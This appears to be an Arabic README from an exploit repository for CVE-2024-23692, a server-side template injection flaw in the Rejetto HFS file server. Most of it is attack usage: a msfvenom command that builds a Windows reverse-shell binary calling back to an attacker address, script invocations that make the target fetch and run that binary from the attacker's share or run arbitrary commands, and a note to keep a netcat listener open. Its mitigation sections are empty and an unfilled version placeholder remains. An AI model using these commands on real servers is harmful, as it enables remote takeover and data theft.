
Rejetto HFS (HTTP File Server) هو خادم ملفات ويب بسيط يُسهّل مشاركة الملفات عبر شبكة أو عبر الإنترنت.
Rejetto HFS (خادم ملفات HTTP) هو خادم ملفات ويب بسيط يسهّل مشاركة الملفات عبر الشبكة أو الإنترنت. على الرغم من سهولة استخدامه وبساطته، تم اكتشاف ثغرة حرجة (CVE-2024-23692) تجعل الخادم هدفًا للمهاجمين.
CVE-2024-23692 هي ثغرة حقن قوالب من جهة الخادم (SSTI) تم تحديدها في Rejetto HFS. تسمح هذه الثغرة للمهاجم بحقن قوالب خبيثة وتنفيذها على الخادم. إذا تم استغلالها، فقد تؤدي إلى تنفيذ تعليمات برمجية عن بُعد، مما قد يعرض الخادم بالكامل والبيانات المستضافة عليه للخطر.
يمكن للمهاجم الذي يستغل هذه الثغرة:
احصل على شل باستخدام ملف ثنائي خبيث تم إنشاؤه بواسطة msfvenom.
ملاحظة: اترك nc في وضع الاستماع.
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_1.png)
قم بتشغيل أمر عن بُعد.
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo
قد يستغرق عرض النتيجة حوالي 15 ثانية.
![[Screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_2.png)
جميع إصدارات Rejetto HFS حتى الإصدار [أدخل أحدث إصدار متأثر هنا] شاملةً إياه متأثرة بهذه الثغرة.
للتخفيف من المخاطر التي تشكلها CVE-2024-23692، يُنصح المستخدمون بما يلي:
لتحديد ما إذا كان خادمك قد تعرض للاختراق، ابحث عن:
لمزيد من المساعدة والدعم، راجع منتديات مجتمع Rejetto HFS أو قنوات الدعم الرسمية.
هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.